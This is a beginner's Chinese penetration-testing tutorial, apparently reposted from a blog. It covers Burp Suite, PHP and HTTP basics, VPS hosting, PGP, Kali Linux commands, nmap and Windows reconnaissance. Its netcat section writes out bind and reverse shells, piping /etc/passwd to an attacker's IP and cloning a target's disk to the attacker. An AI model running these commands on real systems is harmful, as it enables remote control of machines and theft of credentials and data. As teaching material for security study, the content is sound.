导语:day1主要是一些基本渗透工具的使用方法和一些Linux和kali基础指令哈,如果有错误,希望大佬指点修正,后面会慢慢更新进阶版的其他内容的。
一.基本工具burp suite和php基本知识(小入门)
1.用burp suite访问http可以,访问https需要证书
访问http://burp/
下载证书,工具-选项-高级-证书-查看证书-证书机构-导入
2.网络传输二进制变成hex(16进制)–>人类可读
3.基本php语言:
<?php
echo 'haha';
?>
$a=123; 定义变量
//单行注释
/*
多行注释
*/
4.get和post请求
get:用于取东西
$a=$_GET['name'];
$b=$_GET['age'];
if($b>18)
{
echo 'chengnian'.$a;
}else{
echo 'weichengnian'.$a;
}
post:(用于用户名登录注册)
用post data 输入,burp抓包时就是post请求
get刷新和跳转没有区别,post按回车键会以get的方式读取当前地址,刷新会再次提交数据到当前页面
5.request:向服务器发送请求,服务器给一个结果给客户端
forward:内部重定向(发生跳转)
redirect:服务器收到后发一个状态给客户,客户再次请求,url发生改变
url:统一资源定位器
http://www.baidu.com/index.php
协议 域名 文件
s=文件
?=get请求
ie=参数名
utf-8参数值
&连接符
6.常用的http状态码
200 成功
301 转向了其他url
404 页面资源不存在
500 服务器内部错误
content-type:文件类型
content-length:内容长度
二.操系统和公网服务器的部署作
1.Linux—android系统
(开源)
Windows(常用)
(闭源)
macOS–iOS(苹果操作系统很安全)
(闭源)
闭源:黑盒测试
开源:白盒测试(代码审计)
vps虚拟服务器
vultr.com —-租一个vps,部署可以协议,然后。。。。
租好了可以分配一个ip,连接这台服务器,
Windows 远程桌面连接(用户名administrator)
Linux ssh连接(用户名一般root)
一般用bitvise连接好用
2.Linux小知识
ipconfig 查看ip地址
whoami 查看自己是什么用户
安装一个网站管理系统(宝塔面板)
一些线路:
CN2中国下一代承载网,支持qos,比传统的163线路强
CN2GT便宜,拥堵
CN2GIA贵,质量好
BGP多线机房,自动识别运营商,不同网络自动切换
GCP谷歌公司的线路,贵,质量超级好
AWS亚马逊线路,流量太少
Azure微软线路,慢,中规中矩
PCCW香港线路,贵,网络发达
IPLC国际私有租用线路(专线),极贵,带宽小流量低,直接墙外,不会通过GFW审查
三.踪迹隐藏和加密通信
CDN作用:防止ip被别人发现,流量缓存
如果用户对本尊发起攻击,需要穿过多个cloud flare才能找到
个人信息泄露:
泄露公网ip,就会暴露通信内容
加密的方法(VPN:虚拟专用网络,通常用于企业之间通信)
个人软件:
qq;wx等
各种杀毒软件和国产浏览器会上传数据
个人电脑:
盗版的操作系统
邮件客户端
2.最牛的加密:
pgp加密
公钥public key 加密,私钥private key 解密
公钥可以传播,私钥不能泄密
若pc2想发一条pc1只能看的内容,pc2要导入pc1的公钥
如果要pc1和pc2双向通信,必须两边都拥有对方的公钥
私钥才能解密,所以很重要!!!!!
efs文件加密:只能用于Windows
证书加密:文件夹加密后,加入文件同样会被加密,如果删除证书并且注销后,文件再也打不开,一定要注销!
四.渗透测试系统了解(kali)
1.入侵类操作系统:kali(linux系统)
2020版 kali用户名密码kali
2019版及以下 root toor
2.基本指令及详细介绍:
$ 普通用户权限
sudo su 提权命令
# root权限(机器&人类可用最高权限)
ifconfig 查看ip地址
whoami 查看自己是谁
pwd 查看当前所在目录
cd .. 退一格
(在linux的世界里/是最上层目录)
ls 查看当前目录
ls -la 查看详细信息
d r-x r-x r-x 13 root root 0 Nov 3 11:22 sys
A B C D E F
d 文件夹
– 文件
l 链接
r=read=4 w=write=2 x=execute=1
A=所有者权限
B=所有者所在组权限
C=其他人权限
D=所有人
E=所有人所在的组
F=文件名
rwx r-x r-x
755
r可读–4
w可写–2
x可执行–1
mkdir test 新建文件夹,名字叫test
touch 1.txt 新建文件1.txt
vi 1.txt 使用vi编辑东西
vi是一个命令行编辑器
按下i进入insert模式
esc—:wq 保存退出 :q! 不保存退出
cat 1.txt 看一下1.txt内容
tac
cp [被复制的人] [复制的位置] 复制
mv [被剪切的人] [目标位置] 剪切/改名
rm [目标] 删除
rm -rf [目标] 全部删除
(rm -rf /* 危险命令)
find [要在哪个地方查找] -name [查找的文件名] 找东西
ps 查看进程
ps -ef 查看所有进程
top 看进程
ctrl+c 结束
ps -ef | grep [条件] 筛选符合条件的进程
ps -ef | grep bash 在所有进程里面查看名字叫bash的
| = 叫管道符,把左边命令执行的结果给右边
echo 回显
uname 查看操作系统
uname -a 查看详细信息
chmod [权限数字] [目标文件] 修改权限
chmod 755 -R [文件夹] 修改文件夹内所有东西的权限
防火墙
service iptables start/stop
永久关闭
chkconfig iptables on/off
passwd 修改密码
3.nc监听
服务端:
nc -l -p 4444
客户端:
nc -nv [服务端ip] 4444
1.正向控制:
目标:
nc -lp 3333 -e cmd
黑客:
nc -nv [目标Ip] 3333
2. 反向控制:
黑客:
nc -lp 3333
目标:
nc -nv [黑客ip] 3333 -e cmd
4.nmap扫描器的介绍
nmap [目标ip] 普通扫描
-sT tcp扫描,普通扫描
-sS 隐秘扫描(不形成三次握手),不建立tcp连接,所以不会在防火墙上留下痕迹
-sL [考虑扫一个段] list scan列表扫描,主要用于主机发现
-sn ping scan(ping扫描)只发现主机不扫描端口
-Pn 将所有主机都假定为开机,跳过主机发现过程
-P0 使用ip协议探测主机是否开启
-sU 使用udp扫描
-p [指定扫描哪些端口]
-O 识别操作系统
五.信息搜集工具
1.信息搜集
本地信息搜集:
whoami 查看自己的身份
whoami /all 获取当前域的信息
ipconfig /all 详细的ip信息
arp -a 查看arp表
systeminfo 查看操作系统信息
echo %PROCESSOR_ARCHITECTURE% 查看 cpu型号
wmic product get name,version 查看安装软件和版本信息
wmic qfe get Caption,Description,HotFixID,InstalledOn 查看补丁列表
net user 查看本地用户
net session 显示本地和远程的会话
wmic process list brief 查看进程
net view 查看内网的共享
远程文件信息搜集:
http://seo.chinaz.com/
http://whois.chinaz.com/
2.活跃主机识别
nmap -sP [网段]
nping -tcp -p 445 -data [十六进制数据] [目标ip]
(对目标的445端口,以tcp协议发送一段十六进制的数据)
nmap -sV [目标ip] 服务指纹识别
amap -bq [目标ip] [端口] 服务枚举
nc -nvz [ip] 1-65535 使用nc进行扫描
3.kali加密传输
目标:
cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1
黑客:
nc -l -p 3333 > kali.txt
4.传输文件
目标:
nc -nv [黑客ip] 3333 < [要传的文件] -q 1
黑客:
nc -lp 3333 > xx.txt
5. 远程克隆linux硬盘:
黑客:
nc -lp 3333 | dd of=/dev/sda
目标:
dd if=/dev/sda | nc -nv [黑客ip] 3333 -q 1
原文链接:https://blog.csdn.net/m0_59082970/article/details/123549449?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165918469516782425173733%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165918469516782425173733&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-21-123549449-null-null.nonecase&utm_term=%E9%A6%99%E6%B8%AFcdn
原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/2933